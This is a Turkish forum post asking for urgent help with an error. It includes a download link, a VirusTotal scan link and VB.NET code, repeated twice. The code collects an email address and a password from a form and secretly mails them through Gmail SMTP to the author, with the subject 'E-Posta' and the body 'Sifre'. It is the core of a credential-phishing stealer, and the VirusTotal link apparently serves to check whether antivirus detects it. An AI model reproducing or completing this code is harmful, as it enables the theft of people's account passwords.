Arkadaşlar çook acil yardım edin. Şu hatayı alıyorum. Yorumlarınızı Bekliyorum...
iNDİRMEK İÇİN TIKLAYIN ==> QFS.mobi - Download 890186
Virüs total:
Kullandığım kodlar ise şu : https://www.virustotal.com/tr/file/...edc88e60373736c9528b5a7c/analysis/1380208516/
If TextBox1.Text = "" Then
MsgBox("E-Posta Boş Bırakılamaz.")
If TextBox2.Text = "" Then
MsgBox("Şifre Alanı Boş Bırakılamaz.")
Else
End If
End If
Dim smtpServer As New SmtpClient()
Dim mail As New MailMessage()
smtpServer.Credentials = New Net.NetworkCredential("[email protected]", "şifre")
'using gmail
smtpServer.Port = 587
smtpServer.Host = "smtp.gmail.com"
smtpServer.EnableSsl = True
mail = New MailMessage()
mail.From = New MailAddress("[email protected]")
mail.To.Add("şifre")
mail.Subject = "E-Posta : " & TextBox1.Text
mail.Body = "Sifre : " & TextBox2.Text & ","
smtpServer.Send(mail)
iNDİRMEK İÇİN TIKLAYIN ==> QFS.mobi - Download 890186
Virüs total:
Kullandığım kodlar ise şu : https://www.virustotal.com/tr/file/...edc88e60373736c9528b5a7c/analysis/1380208516/
If TextBox1.Text = "" Then
MsgBox("E-Posta Boş Bırakılamaz.")
If TextBox2.Text = "" Then
MsgBox("Şifre Alanı Boş Bırakılamaz.")
Else
End If
End If
Dim smtpServer As New SmtpClient()
Dim mail As New MailMessage()
smtpServer.Credentials = New Net.NetworkCredential("[email protected]", "şifre")
'using gmail
smtpServer.Port = 587
smtpServer.Host = "smtp.gmail.com"
smtpServer.EnableSsl = True
mail = New MailMessage()
mail.From = New MailAddress("[email protected]")
mail.To.Add("şifre")
mail.Subject = "E-Posta : " & TextBox1.Text
mail.Body = "Sifre : " & TextBox2.Text & ","
smtpServer.Send(mail)
Son düzenleme:


